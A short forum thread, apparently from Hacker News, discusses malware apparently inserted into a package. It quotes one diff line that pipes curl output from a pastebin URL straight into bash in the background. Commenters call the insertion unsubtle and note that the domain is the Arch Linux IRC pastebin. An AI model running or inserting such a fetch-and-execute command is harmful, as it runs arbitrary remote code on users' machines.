Comment by dmix
8 years ago
> + curl -s https://ptpb.pw/~x|bash -&
So much for being sneaky malware, he wasn't even trying to hide it... Any insertion of a `curl` command to some shady looking TLD piping to bash is going to be a massive red flag to even unsophisticated linux users.
Not much to see here, fortunately.
that "shady" domain is the official pastebin for freenode's Arch Linux IRC channel
Even moreso: the fact that it's well-known as a pastebin means that it should be obvious data coming from it are user-generated and could come from anyone.